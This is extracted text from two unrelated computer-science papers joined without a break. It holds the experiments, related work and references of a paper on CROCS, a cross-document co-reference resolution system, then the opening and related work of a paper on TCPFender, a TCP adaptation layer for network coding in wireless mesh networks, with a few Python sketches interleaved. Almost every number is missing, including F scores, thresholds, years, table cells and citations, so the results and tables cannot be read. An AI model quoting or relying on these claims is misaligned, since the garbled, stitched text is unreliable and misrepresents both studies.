• φ -ceaf score (luo, ): an alternate way of computing precision, recall, and f scores us- ing the best -to- mapping between the equiv- alence classes obtained and those in the ground truth. the best mapping of ground-truth to out- put classes exhibits the highest mention overlap. all experiments were conducted on a core intel i . ghz processor with gb ram running ubuntu . . . parameter tuning the use of external features extracted from kb’s (for mention groups) forms an integral part in the work- ing of crocs, and is represented by the choice of the threshold, θ. given an input corpus, we now dis- cuss the tuning of θ based on splitting the available data into training and testing subsets. we randomly partition the input data into parts (assumed to be labeled as a, b, and c). one of the data parts is the training data and the other two parts are the test data. using the gold annotations of the training dataset, we empirically learn the value of θ, that provides the best b f score for ccr, using a simple line search. initially, θ is set to (no kb usage) and is subsequently decreased using . method p (%) r (%) f (%) crocs . . . stream (rao, ) . . . inference (singh, ) - - . table : b f results on john smith dataset. as the step size for each of the learning phase itera- tions. as soon as the performance of crocs is seen to degrade (compared to the previous iteration), the procedure is terminated and the previous value of θ is considered as the learned parameter value. the final results we report are averaged over indepen- dent runs, each considering different data partitions (among a, b, and c) as the training data. although more advanced learning algorithms might also be used, this simple approach is observed to work well. learning of the θ value might converge to a local maximum, or may be distorted due to presence of noise in the training data. however, we later show (in section . ) that the performance of crocs is robust to small variations of θ. . john-smith corpus: long-tail entities table compares crocs with two state-of-the- art methods achieving the best published results for this benchmark. randomly selected documents were used as the training set (while the rest formed the test set) and the subsequent θ value learned (as described in section . ) was . . since the corpus contained mostly long-tail entities not present in any kb (only - of the different john smith’s are in wikipedia, eg. the explorer john smith etc.), the kb matches were too unreliable and led to the introduc- tion of noise. hence, a high value of θ was obtained (i.e. kb features mostly disregarded). crocs (using sample-based spectral cluster- ing) achieves an f score of . %, while stream (rao et al., ) and inference (singh et al., ) reach only . % and . % resp. crocs also has a high φ -ceaf score of . % exhibiting substantial gains over prior methods . our novel notion of semsum’s with extended scope (mentions and co-occurring mention groups) proved essential for outperforming the existing methods (see sec- tion . ). the runtime of crocs was only around seconds. data and detailed crocs output results are available at (www.dropbox.com/s/ grribug yghys/john_smith_ dataset.zip?dl= ) method p (%) r (%) f (%) crocs . . . polyuhk (artiles, ) uva (artiles, ) table : b f results on weps- dataset. . weps- corpus: web contents we compared sampled spectral clustering based crocs on the weps- corpus against the best methods reported in (artiles et al., ). we em- pirically obtained the kb match parameter θ = . 
according to the train-test setup described earlier (with training documents). crocs achieves a b based f score of . % and a φ -ceaf score of . % (table ), providing an improvement of about . f score points . the gain observed is not as high as that for the john smith dataset, as in the weps- corpus doc- uments are longer, giving richer context with fewer ambiguous entity mentions. thus, simpler methods also perform fairly well. the runtime of crocs on weps- corpus was about seconds. . new york times corpus: web scale the previous two datasets, john smith and weps- are too small to assess the robustness of crocs for handling large data. we therefore ran crocs (with sample-based spectral clustering) on a random sample of , nyt news articles. the knowl- edge enrichment threshold θ was learned to be . with k training documents. crocs achieved a b f score of . % (with p = . % and r = . %) and a φ - ceaf score of . %. no prior methods report f performance figures for this large dataset. how- ever, the factor graph based approach of (singh et al., ) measures the mention co-reference ac- curacy for a sample of , documents. accu- racy is defined as the ratio of document clusters as- signed to an entity to the ground truth annotations. we also sampled , documents considering only mentions with multiple entity candidates. crocs achieved an accuracy of . %, as compared to . % for (singh et al., ). as for run-time, crocs took . hours to pro- cess around , news articles selected as the test corpus. we also compared this result against al- data and detailed crocs output results are avail- able at (www.dropbox.com/s/ i ot seavcfdyc/weps- _ dataset.zip?dl= ) crocs configuration weps- nyt sentences only . . basic scope . . extended scope . . ned baseline . . table : b f scores for crocs enrichment variants. ternative algorithms within our framework (see sec- tion . ). hence, crocs efficiently handles web scale input data. . sensitivity studies the crocs framework involves a number of tun- able hyper-parameters adjusting the precise perfor- mance of the components. we now study the robust- ness of crocs (sample-based spectral clustering variant) for varying parameter values. knowledge enrichment scope: crocs supports several levels of knowledge en- richment for semsum’s construction: i) including only sentences of a mention group (disregarding the kb), ii) using distant kb labels for the given mention group only (basic scope), and iii) adding distant kb labels for co-occurring mention groups (extended scope). we compared these configura- tions among each other and also against a state- of-the-art ned method alone. the results are shown in table . we used aida (hoffart et al., ) open-source software (https://github. com/yago-naga/aida) for ned, and combined mentions mapped to the same kb entity. we use the trained value of θ obtained previously (for the re- spective datasets) for constructing the basic and ex- tended scope of semsum’s, and report the best b f scores. note that the sentences only and ned con- figurations are independent of the choice of θ value. real-life web articles contain a mixture of promi- nent entities, ambiguous names, and long-tail en- tities; hence sole reliance on ned for ccr fares poorly. the extended scope semsum’s construction produces superior results compared to other models. knowledge enrichment matching threshold: to study the influence of different degrees of dis- tant kb feature extraction, we varied the enrich- ment matching threshold θ from . (accept all kb matches) to . 
(no import from kb). the john smith dataset largely containing long-tail entities uses θ ∼ (trained value), and operates on sem- sum’s containing practically no feature inclusion from external kb’s. hence, we only consider the scenario when the kb is completely disregarded (i.e. dataset θ . . . . . . . weps- . . . . . . . nyt . . . . . . . table : b f scores (%) for different choices of θ. dataset θ used p(%) r(%) f (%) weps- . . . . nyt . . . . table : θ error sensitivity of crocs θ = . ) and obtain a b f score of . %. for the other two datasets, the b f results for varying θ are shown in table . we observe that kb features help the ccr process and the best results are obtained for θ between . and . . we observe that the exact choice of θ is not a sensitive issue, and any choice between . and . yields fairly good f scores (within % of the empirically optimal f results). hence, our approach is robust regarding pa- rameter tuning. we observe that the trained value of θ (obtained previously) for both the weps- and the nyt datasets are close to the optimal setting as seen from table and provide nearly similar f score perfor- mance. therefore, we set θ = . and consider the entire input corpora as test set for the remainder of our experiments. to reconfirm the robustness of crocs to θ value ranges, we use the kb threshold trained on weps- dataset, and test it on the nyt dataset (and vice versa). from table we observe crocs to render comparable performance in presence of er- rors during the θ learning phase. clustering hyper-parameters: we study the effect of varying k, the number of sub- clusters for the bisection procedure invoked at each level of the hierarchical clustering. by default, this is set to (i.e. bisection). table shows the b f scores for different choices of k, for the three datasets (with θ = . for john smith and θ = . for the other two datasets). we observe that k = performs best in all cases. the output quality mono- tonically drops with increase in k, as this forces even similar mention groups to form separate clusters. hence, bisection allows the hierarchical process to adjust the model selection at the global level. alternative kb: to assess the impact of dependency on freebase (feature extraction of best matching entity), we dataset k= k= k= k= john smith . . . . weps- . . . . nyt . . . . table : b f scores (%) for different # sub-clusters k. dataset freebase yago p(%) r(%) f p(%) r(%) f weps- . . . . . . nyt . . . . . . table : crocs b f scores with freebase vs. yago ran alternative experiments on the weps- and nyt datasets with the yago kb (www.yago- knowledge.org). we obtain all approximate matches for a mention group and rank them based on the keyphrase similarity model (section ) us- ing sentences of the mention group and extracted features (from the yago haslabel property and in- foboxes in wikipedia pages of the sameas link). results in table show similar performance, depict- ing no preference of crocs to any particular kb. . algorithmic variants the crocs framework supports a variety of al- gorithmic building blocks, most notably, clustering methods (eg., k-means) or graph partitioning for the bisection steps, and most importantly, sampling- based methods versus methods that fully process all data points. the comparative results for the three different datasets are presented in table . for the john smith corpus (with θ = . ), all algorithms except sample-based k-means achieved similar performances in accuracy and runtime. 
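all of these variants plug into the same sample-based bisection loop from the clustering algorithm section. sketched below, under the assumption that mention groups are given as feature vectors with a user-supplied similarity function and an arbitrary bisection routine (for example the fiedler-vector split sketched earlier, or balanced graph partitioning), is one such step including the fold-in of non-sampled groups and the bic-based split decision.

```python
import numpy as np

def cluster_bic(points):
    """gaussian-style bic of one cluster, following the stopping-criterion formula."""
    centroid = points.mean(axis=0)
    sq_dev = np.sum((points - centroid) ** 2, axis=1)
    return float(np.sum(np.log(sq_dev + 1e-12)) + np.log(len(points)))

def bisect_step(vectors, similarity, split_fn, sample_size):
    """one sample-based bisection of a cluster of mention-group vectors."""
    n = len(vectors)
    sample = np.random.choice(n, size=min(sample_size, n), replace=False)
    sim = np.array([[similarity(vectors[i], vectors[j]) for j in sample] for i in sample])
    mask = split_fn(sim)                      # boolean array over the sampled groups
    if mask.all() or not mask.any():          # degenerate split: finalize as leaf
        return None

    left, right = list(sample[mask]), list(sample[~mask])
    for i in range(n):                        # fold in the non-sampled mention groups
        if i in sample:
            continue
        avg_left = np.mean([similarity(vectors[i], vectors[j]) for j in left])
        avg_right = np.mean([similarity(vectors[i], vectors[j]) for j in right])
        (left if avg_left >= avg_right else right).append(i)

    parent = cluster_bic(vectors)
    children = (len(left) * cluster_bic(vectors[left]) +
                len(right) * cluster_bic(vectors[right])) / n   # size-weighted (micro) average
    return (left, right) if children > parent else None         # None: mark the cluster as leaf
```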
the best method was the full-fledged spectral clustering, with about % f score improvement. with the weps- dataset, we obtain a similar pic- ture w.r.t. output quality. however, this dataset is large enough to bring out the run-time differences. sampling-based methods, including crocs, were about × faster than their full-fledged counterparts, albeit with a meager loss of about % in f score. the nyt dataset finally portrays the scenario on huge datasets. here, only the sample-based methods ran to completion, while all the full-fledged methods were terminated after hours. the fastest of them, the simple k-means method, had processed only about % of the data at this point (needing about hours on extrapolation). in contrast, crocs, using sample-based spectral clustering or graph par- titioning, needed about . hours for the , documents. the sampling-based k-means competi- tor was slightly faster ( . hours), but lost dramat- ically on output quality: with only about % f score compared to % f score for crocs. hence, we observe that crocs is indeed well designed for scalable sampling-based ccr, whereas other simpler methods like k-means, lacking transi- tivity awareness, fail to deliver good output quality. related work co-reference resolution (cr): existing intra- document cr methods combine syntactic with se- mantic features for identifying the best antecedent (preceding name or phrase) for a given mention (name, phrase, or pronoun). syntactic features are usually derived from deep parsing of sentences and noun group parsing. semantic features are obtained by mapping mentions to background knowledge re- sources such as wikipedia. an overview of cr methods is given in (ng, ). recent methods adopt the paradigm of multi-phase sieves, apply- ing a cascade of rules to narrow down the choice of antecedents for a mention (e.g., (haghighi & klein, ; raghunathan et al., ; ratinov & roth, )). the cluster-ranking family of methods (e.g., (rahman & ng, b)) extends this paradigm for connecting mentions with a cluster of preceding mentions. person name disambiguation in cr deals with only person names, title, nicknames, and sur- face forms variations (chen & martin, ). distant knowledge labels for cr: to obtain semantic features, additional knowledge resources such as wikipedia, yago ontology, and framenet corpus have been considered (suchanek et al., ; rahman & ng, a; baker, ). to identify the entity candidate(s) that a mention (group) should use for distant supervision, cr methods such as (rati- nov & roth, ; lee et al., ) use matching heuristics based on the given mention alone to iden- tify a single entity or all matching entities with con- fidence above some threshold. zheng et al. ( ) generalizes this by maintaining a ranked list of en- tities for distant labeling, as mention groups are up- dated. unlike crocs, prior methods utilize only the candidates for the given mention (group) it- self and distant knowledge features for co-occurring mentions are not considered. cross-document cr (ccr): early works (gooi & allan, ) on ccr, introduced by (bagga & dataset clustering method b measure φ measure (%) run-timep (%) r (%) f (%) spectral clustering . . . . . sec k-means clustering . . . . . sec john balanced graph partition . . . . . sec smith sampled k-means . . . . . sec sampled spectral clustering . . . . . sec sampled graph partitioning . . . . . sec weps- spectral clustering . . . . sec k-means clustering . . . . . sec balanced graph partition . . . . . sec sampled k-means . . . . 
sec sampled spectral clustering . . . . . sec sampled graph partitioning . . . . . sec k-means clustering* . * . * . * . * > hrs new york sampled k-means . . . . . hrs times sampled spectral clustering . . . . . hrs sampled graph partitioning . . . . . hrs * results after run terminated at hrs (∼ % mentions processed) table : accuracy and scalability of various algorithms embedded in crocs baldwin, ), used ir-style similarity measures (tf×idf cosine, kl divergence, etc.) on features, similar to intra-document cr. recent works such as (culotta et al., ; singh et al., ; singh et al., ) are based on probabilistic graphical models for jointly learning the mappings of all mentions into equivalence classes. the features for this learning task are essentially like the ones in local cr. baron and freedman ( ) proposed a ccr method in- volving full clustering coupled with statistical learn- ing of parameters. however, this method does not scale to large corpora making it unsuitable for web contents. a more light-weight online method by (rao et al., ) performs well on large bench- mark corpora. it is based on a streaming cluster- ing algorithm, which incrementally adds mentions to clusters or merges mention groups into single clus- ters, and has linear time complexity; albeit with infe- rior clustering quality compared to advanced meth- ods like spectral clustering. several ccr methods have harnessed co-occurring entity mentions, espe- cially for the task of disambiguating person names (mann & yarowsky, ; niu et al., ; chen & martin, ; baron & freedman, ). how- ever, these methods do not utilize knowledge bases, but use information extraction (ie) methods on the input corpus itself; thus facing substantial noise due to ie quality variance on stylistically diverse docu- ments like web articles. spectral clustering: (luxburg, ) provides a detailed study on spectral clustering models and al- gorithms. yan et al. ( ) proposed two approxi- mation algorithms, based on the k-means technique and random projections, reducing the o(n ) time complexity to o(k ) + o(kn) where k is the num- ber of clusters. in ccr, the number of clusters (truly distinct entities) can be huge and typically unknown; hence (shamir & tishby, ; krishnamurty et al., ; wauthier et al., ) developed active spectral clustering, where the expensive clustering step is based on data samples and other data points are merely “folded in”. the term “active” refers to the active learning flavor of choosing the samples (notwithstanding that these methods mostly adopt uniform random sampling). conclusions we have presented the crocs framework for cross-document co-reference resolution (ccr). it performs sample-based spectral clustering or graph partitioning in a hierarchical bisection process to ob- tain the mention equivalence classes, thereby avoid- ing model-selection parameters and the high cost of clustering or partitioning. crocs constructs features for mention groups by considering co- occurring mentions and obtaining distant semantic labels from kb’s (for semsum’s). feature generation from multiple kb’s and cater- ing to streaming scenarios (e.g., news feeds or social media) are directions of future work. references j. artiles, j. gonzalo, s. sekine: . weps evalua- tion campaign: overview of the web people search clustering task. www . a. bagga, b. baldwin: . entity-based cross- document coreferencing using the vector space model. in coling-acl, pages – . c. f. baker: . framenet, current collaborations & future goals. lrec, ( ): – . a. 
baron, m. freedman: . who is who & what is what: experiments in cross-document co- reference. in emnlp, pages – . a. buluc, h. meyerhenke, i. safro, p. sanders, c. schulz: . recent advances in graph partitioning. karl- sruhe institute of technology, technical report. j. cai, m. strube: . evaluation metrics for end- to-end coreference resolution systems. in sigdial, pages – . y. chen, j. martin: . towards robust unsupervised personal name disambiguation. in emnlp-conll, pages – . m. cornolti, p. ferragina, m. ciaramita: . a frame- work for benchmarking entity-annotation systems. in www, pages – . s. cucerzan: . large-scale named entity dis- ambiguation based on wikipedia data. in emnlp- conll, pages – . a. culotta, m. l. wick, a. mccallum: . first-order probabilistic models for coreference resolution. in hlt-naacl, pages – . p. domingos, s. kok, d. lowd, h. poon, m. richard- son, p. singla: . markov logic. probabilistic ilp. springer-verlag, pages – . p. domingos, d. lowd: . markov logic: an in- terface layer for artificial intelligence. morgan and claypool publishers, . j. r. finkel, t. grenager, c. d. manning: . incor- porating non-local information into information ex- traction systems by gibbs sampling. in acl, pages – . c. h. gooi, j. allan: . cross-document coreference on a large scale corpus. in hlt-naacl, pages – . p. d. grünwald: . the minimum description length principle. mit university press. a. haghighi, d. klein: . simple coreference reso- lution with rich syntactic and semantic features. in emnlp, pages – . a. haghighi, d. klein: . coreference resolution in a modular, entity-centered model. in hlt-naacl, pages – . h. hajishirzi, l. zilles, d. s. weld, l. s. zettlemoyer: . joint coreference resolution and named-entity linking with multi-pass sieves. in emnlp, pages – . j. hoffart, m. a. yosef, i. bordino, h. fürstenau, m. pinkal, m. spaniol, b. taneva, s. thater, g. weikum: . robust disambiguation of named entities in text. in emnlp, pages – . n. hourdakis, m. argyriou, g. m. petrakis, e. e. mil- ios: . hierarchical clustering in medical docu- ment collections: the bic-means method. journal of digital information management, ( ): – . g. karypis, v. kumar: . a fast and highly quality multilevel scheme for partitioning irregular graphs. journal on scientific computing, ( ): – . b. w. kernighan, s. lin: . an efficient heuristic pro- cedure for partitioning graphs. bell system technical journal. d. koller, n. friedman: . probabilistic graphical models: principles and techniques. mit press. a. krishnamurty, s. balakrishnan, m. xu, a. singh: . efficient active algorithms for hierarchical clustering. in icml, pages – . h. lee, y. peirsman, a. chang, n. chambers, m. sur- deanu, d. jurafsky: . stanford’s multi-pass sieve coreference resolution system at the conll- shared task. in conll, pages – . h. lee, a. chang, y. peirsman, n. chambers, m. sur- deanu, d. jurafsky: . deterministic coreference resolution based on entity-centric, precision-ranked rules. computational linguistics journal, ( ): – . h. lee, m. recasens, a. x. chang, m. surdeanu, d. ju- rafsky: . joint entity and event coreference res- olution across documents. in emnlp-conll, pages – . h. a. loeliger: . an introduction to factor graphs. in mlsb. x. luo: . on coreference resolution performance metrics. in hlt-emnlp, pages – . u. von luxburg: . a tutorial on spectral clustering. statistics and computing journal, ( ): – . g. s. mann, d. yarowsky: . unsupervised personal name disambiguation. in conll,hlt-naacl, pages – . d. n. 
milne, i. h. witten: . learning to link with wikipedia. in cikm, pages – . v. ng: . supervised noun phrase coreference re- search: the first fifteen years. in acl, pages – . c. niu, w. li, r. k. srihari: . weakly super- vised learning for cross-document person name dis- ambiguation supported by information extraction. in acl, article . k. raghunathan, h. lee, s. rangarajan, n. chambers, m. surdeanu, d. jurafsky, c. manning: . a multi- pass sieve for coreference resolution. in emnlp, pages – . a. rahman, v. ng: a. coreference resolution with world knowledge. in acl, pages – . a. rahman, v. ng: b. ensemble-based coreference resolution. in ijcai, pages – . d. rao, p. mcnamee, m. dredze: . streaming cross document entity coreference resolution. in col- ing, pages – . l. a. ratinov, d. roth, d. downey, m. anderson: . local and global algorithms for disambiguation to wikipedia. in acl, pages – . l. a. ratinov, d. roth: . learning-based multi- sieve co-reference resolution with knowledge. in emnlp-conll, pages – . m. richardson, p. domingos: . markov logic net- works. journal of machine learning, ( - ): – . e. sandhaus: . the new york times annotated cor- pus overview. linguistic data consortium. g. e. schwarz: . estimating the dimension of a model. annals of statistics, ( ): – . o. shamir, n. tishby: . spectral clustering on a budget. journal of machine learning research - pro- ceedings track : – . s. singh, m. l. wick, a. mccallum: . distantly la- beling data for large scale cross-document corefer- ence. corr abs/ . . s. singh, a. subramanya, f. pereira, a. mccallum: . large-scale cross-document coreference us- ing distributed inference and hierarchical models. in acl, pages – . f. m. suchanek, g. kasneci, g. weikum: . yago: a core of semantic knowledge. in www, pages – . b. taneva, m. kacimi, g. weikum: . finding im- ages of difficult entities in the long tail. in cikm, pages – . f. l. wauthier, n. jojic, m. i. jordan: . active spec- tral clustering via iterative uncertainty reduction. in kdd, pages – . d. yan, l. huang, m. i. jordan: . fast approximate spectral clustering. in kdd, pages – . j. zheng, l. vilnis, s. singh, j. d. choi, a. mccal- lum: . dynamic knowledge-base alignment for coreference resolution. in conll, pages – . submitted may accepted september published october corresponding author chen zhang, cz @mun.ca academic editor baochun li additional information and declarations can be found on page doi . /peerj-cs. copyright zhang et al. distributed under creative commons cc-by . open access tcp adaptation with network coding and opportunistic data forwarding in multi-hop wireless networks chen zhang , yuanzhu chen and cheng li department of computer science, memorial university of newfoundland, st. john’s, canada department of electrical and computer engineering, memorial university of newfoundland, st. john’s, canada abstract opportunistic data forwarding significantly increases the throughput in multi-hop wireless mesh networks by utilizing the broadcast nature of wireless transmissions and the fluctuation of link qualities. network coding strengthens the robustness of data transmissions over unreliable wireless links. however, opportunistic data forwarding and network coding are rarely incorporated with tcp because the frequent occurrences of out-of-order packets in opportunistic data forwarding and long decoding delay in network coding overthrow tcp’s congestion control. 
in this paper, we propose a solution dubbed tcpfender, which supports opportunistic data forwarding and network coding in tcp. our solution adds an adaptation layer to mask the packet loss caused by wireless link errors and provides early positive feedback to trigger a larger congestion window for tcp. this adaptation layer functions over the network layer and reduces the delay of acks for each coded packet. the simulation results show that tcpfender significantly outperforms tcp/ip in terms of the network throughput in different topologies of wireless networks. subjects computer networks and communications, network science and online social networks keywords tcp, network coding, opportunistic data forwarding, multi-hop wireless networks introduction wireless mesh networks have emerged as the most common technology for the last mile of internet access. the internet provides a platform for rapid and timely information exchanges among clients and servers. transmission control protocol (tcp) has become the most prominent transport protocol on the internet. since tcp was originally designed primarily for wired networks that have low bit error rates, moderate packet loss, and packet collisions, the performance of tcp degrades to a greater extent in multi-hop wireless networks, where several unreliable wireless links may be involved in data transmissions (aguayo et al., ; jain & das, ). however, multi-hop wireless networks have several advantages, including rapid deployment with less infrastructure and less transmission power over multiple short links. moreover, a high data rate can be achieved by novel cooperation or high link utilization (larsson, ). some important issues are being addressed by researchers to utilize these capabilities and increase tcp performance in multi-hop wireless networks, such as efficiently searching the ideal path from a source to a destination, maintaining reliable wireless links, protecting nodes from network attacks, reducing energy consumption, and supporting different applications. in multi-hop wireless networks, data packet collision and link quality variation can cause packet losses. tcp often incorrectly assumes that there is congestion, and therefore reduces the sending rate. however, tcp is actually required to transmit continuously to overcome these packet losses. as a result, such a problem causes poor performance in multi-hop wireless networks. there are extensive studies working on these harmful effects. some studies proposed reducing the collision between tcp data packets and tcp acknowledgements or dynamically adjusting the congestion window. other relief may come from network coding. the pioneering paper proposed by ahlswede et al. ( ) presents the fundamental theory of network coding. instead of forwarding a single packet at a time, network coding allows nodes to recombine input packets into one or several output packets. furthermore, network coding is also very well suited for environments where only partial or uncertain data is available for making a decision (mehta & narmawala, ).
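as a toy illustration of that recombination idea (the classic two-packet relay case, not any specific protocol evaluated here), a node can broadcast the xor of two overheard, equal-length packets, and each neighbour that already holds one of them recovers the other:

```python
def xor_packets(a: bytes, b: bytes) -> bytes:
    assert len(a) == len(b), "packets are padded to equal length before coding"
    return bytes(x ^ y for x, y in zip(a, b))

p1 = b"payload from node a"
p2 = b"payload from node b"
coded = xor_packets(p1, p2)             # single coded transmission by the relay
assert xor_packets(coded, p2) == p1     # a neighbour holding p2 recovers p1
assert xor_packets(coded, p1) == p2     # a neighbour holding p1 recovers p2
```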
the link quality variation in multi-hop wireless networks is widely studied in the opportunistic data forwarding under user datagram protocol (udp). it was traditionally treated as an adversarial factor in wireless networks, where its effect must be masked from upper-layer protocols by automatic retransmissions or strong forwarding error corrections. however, recent innovative studies utilize the characteristic explicitly to achieve opportunistic data forwarding (biswas & morris, ; chen, zhang & marsic, ; wang, chen & li, ). unlike traditional routing protocols, the forwarder in opportunistic routing protocols broadcasts the data packets before the selection of next- hop forwarder. opportunistic routing protocols allow multiple downstream nodes as candidates to forward data packets instead of using a dedicated next-hop forwarder. since the broadcasting nature of wireless links naturally supports both network coding and opportunistic data forwarding, many studies work on improving udp performance in multi-hop wireless networks by opportunistic data forwarding and network coding. however, opportunistic data forwarding and network coding are inherently unsuitable for tcp. the frequent dropping of packets or out-of-order arrivals overthrow tcp’s congestion control. specifically, opportunistic data forwarding does not attempt to forward packets in the same order as they are injected in the network, so the arrival of packets will be in a different order. network coding also introduces long coding delays by both the encoding and the decoding processes; besides, it is possible along with some scenarios of not being able to decode packets. these phenomena introduce duplicated ack segments and frequent timeouts in tcp transmissions, which reduce the tcp throughput significantly. our proposed protocol, called tcpfender, uses opportunistic data forwarding and network coding to improve tcp throughputs. tcpfender adds an adaptation layer above the network layer to cooperate with tcp’s control feedback loop; it makes the tcp’s congestion control work well with opportunistic data forwarding and network coding. tcpfender proposes a novel feedback-based scheme to detect the network congestion and distinguish duplicated acks caused by out-of-order arrivals in opportunistic data forwarding from those caused by network congestion. we compared the throughput of tcpfender and tcp/ip in different topologies of wireless mesh networks, and analyzed the zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. influence of batch sizes on the tcp throughput and the end-to-end delay. since our work adapts the tcpfender to functioning over the network layer without any modification to tcp itself, it is easy to deploy in wireless mesh networks. related work opportunistic data forwarding exor (extreme opportunistic routing) is a seminal effort in opportunistic routing protocols (biswas & morris, ). it is an integrated routing and mac protocol that exploits the broadcast nature of wireless media. in a wireless mesh network, when a source transmits a data packet to a destination by several intermediate nodes which are decided by the routing module, other downstream nodes not in the routing path, can overhear the transmission. if the dedicated intermediate node, which is in the routing path, fails to receive this packet, other nearby downstream nodes can be scheduled to forward this packet instead of the sender retransmitting. 
in this case, the total transmission energy consumption and the transmission delay can be reduced, and the network throughput will be increased. unfortunately, traditional ip forwarding dictates that all nodes without a matching receiver address should drop the packet, and only the node that the routing module selects to be the next hop can keep it for forwarding subsequently, so traditional ip forwarding is easily affected by link quality variation. however, exor allows multiple downstream nodes to coordinate and forward packets. the intermediate nodes, which are ‘closer’ to the destination, have a higher priority in forwarding packets towards the destination. exor can utilize the transient high quality of links and obtains an opportunistic forwarding gain by taking advantage of transmissions that reach unexpectedly far or fall unexpectedly short. in exor, a forwarding schedule is proposed to reduce duplicate transmissions. this schedule guarantees that only the highest priority receiver will forward packets to downstream nodes. however, this ‘strict’ schedule also reduces the possibilities for spatial reuse. the study in (chachulski et al., ) shows that exor can have better spatial reuse of wireless media. furthermore, this schedule may be violated due to frequent packet loss and packet collision. opportunistic data forwarding with network coding studies show that network coding can reduce the data packet collision and approach the maximum theoretical capacity of networks (ahlswede et al., ; li, yeung & cai, ; koetter & médard, ; laneman, tse & wornell, ; jaggi et al., ; ho et al., ). many researchers incorporate network coding in opportunistic data forwarding to improve the throughput performance (chachulski et al., ; lin, li & liang, ; lin, liang & li, ; zhu et al., ). more (mac-independent opportunistic routing and encoding) is practical opportunistic routing protocol based on random linear network coding (chachulski et al., ). in more, the source node divides data packets from the upper layer into batches and generates coded packets of each batch. similar to exor, packets in more are also forwarded based on a batch. packets with the same batch index can be encoded together. the destination node can decode these coded packets to original packets after receiving enough independently coded packets in the same batch. zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the destination receives enough packets when the decoding matrix reaches the full rank, then these original packets will be pushed to the upper layer. more coordinates the forwarding of each node using a transmission credit system, which is calculated based on how effective it would be in forwarding coded data packets to downstream nodes. this transmission credit system reduces the possibility that intermediate nodes forward the same packets in duplication. however, more uses a ‘stop-and-wait’ design with a single batch in transmission, which is not efficient utilizing the bandwidth of networks. cope focuses on inter-session network coding; it is a framework to combine and encode data flows through joint nodes to achieve a high throughput (basagni et al., ). caor (coding aware opportunistic routing) proposes a localized coding-aware opportunistic routing mechanism to increase the throughput of wireless mesh networks. in this protocol, the packet carries out with the awareness of coding opportunities and no synchronization is required among nodes (yan et al., ). 
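the batch decoding can be illustrated with a toy sketch: each coded packet carries a random coding vector, a received packet is useful only if it raises the rank of the decoding matrix, and the batch becomes decodable at full rank. for simplicity the sketch codes over gf(2), whereas schemes like more use random linear coding over a larger field (commonly gf(2^8)); the batch size and payload length are arbitrary toy values.

```python
import numpy as np

rng = np.random.default_rng(7)
BATCH_SIZE = 4        # packets per batch (toy value)
PACKET_LEN = 8        # payload bytes per packet (toy value)

def encode(batch):
    """one coded packet: a random gf(2) combination of the batch, tagged with its coding vector."""
    coeffs = rng.integers(0, 2, size=len(batch), dtype=np.uint8)
    if not coeffs.any():
        coeffs[rng.integers(len(batch))] = 1
    payload = np.zeros(PACKET_LEN, dtype=np.uint8)
    for c, pkt in zip(coeffs, batch):
        if c:
            payload ^= pkt
    return coeffs, payload

def gf2_rank(rows):
    """rank over gf(2) by gaussian elimination on the coding vectors."""
    m = [row.copy() for row in rows]
    rank = 0
    for col in range(len(m[0]) if m else 0):
        pivot = next((r for r in range(rank, len(m)) if m[r][col]), None)
        if pivot is None:
            continue
        m[rank], m[pivot] = m[pivot], m[rank]
        for r in range(len(m)):
            if r != rank and m[r][col]:
                m[r] = m[r] ^ m[rank]
        rank += 1
    return rank

batch = [rng.integers(0, 256, PACKET_LEN, dtype=np.uint8) for _ in range(BATCH_SIZE)]
received = []
while not received or gf2_rank([c for c, _ in received]) < BATCH_SIZE:
    received.append(encode(batch))      # keep collecting coded packets
# at full rank the coding vectors form an invertible matrix, so the original
# packets can be recovered by solving the linear system over gf(2).
print(f"batch decodable after {len(received)} coded packets")
```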
nc-mac improves the efficiency of coding decisions by verifying the decodability of packets before they are transmitted (argyriou, ). the scheme focuses on ensuring correct coding decisions at each network node, and it requires no cross-layer interactions. codeor (coding in opportunistic routing) improves more in a few important ways (lin, li & liang, ). in more, the source simply keeps transmitting coded packets belonging to the same batch until the acknowledgment of this batch from the destination has been received. codeor allows the source to transmit multiple batches of packets in a pipeline fashion. they also proposed a mathematical analysis in tractable network models to show the way of ‘stop-and-wait’ affects the network throughput, especially in large or long topology. the timely acks are transmitted from downstream nodes to reduce the penalty of inaccurate timing in transmitting the next batch. codeor applies the ideas of tcp flow control to estimate the correct sending window and the flow control algorithm is similar to tcp vegas, which uses increased queueing delay as congestion signals. slideor works with online network coding (lin, liang & li, ), in which data packets are not required to be divided into multiple batches or to be encoded separately in each batch. in slideor, the source node encodes packets in overlapping sliding windows such that coded packets from one window position may be useful towards decoding the packets inside another window position. once a coded packet is ‘seen’ by the destination node, the source node only encodes packets after this seen packet. since it does not need to encode any packet that is already seen at the destination, slideor can transmit useful coded packets and achieve a high throughput. ccack (cumulative coded acknowledgment) allows nodes to acknowledge coded packets to upstream nodes with negligible overhead (koutsonikolas, wang & hu, ). it utilizes a null space-based (nsb) coded feedback vector to represent the entire decoding matrix. codepipe is a reliable multicast protocol, which improves the multicast throughput by exploiting both intra and inter network coding (li et al., ). core (coding-aware opportunistic routing mechanism) combines inter-session and intra-session network coding (krigslund et al., ). it allows nodes in the network to setup inter-session coding regions where packets from different flows can be xored. packets from the same flow uses random linear network coding for intra-session coding. core provides a solution to cope zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. with the unreliable overhearing and improves the throughput performance in multi-hop wireless networks. ncor focuses on how to select the best candidate forwarder set and allocate traffic among candidate forwarders to approach optimal routing (cai et al., ). it contracts a relationship tree to describe the child-parent relations along the path from the source to the destination. the cost of the path is the sum of the costs of each constituent hyperlink for delivering one unit of information to the destination. the nodes, which create the path with the minimum cost, can be chosen as candidate forwarders. hsu et al. ( ) proposed a stochastic dynamic framework to minimize a long-run average cost. they also analyzed the problem of whether to delay packet transmission in hopes that a coding pair will be available in the future or transmit a packet without coding. garrido et al. 
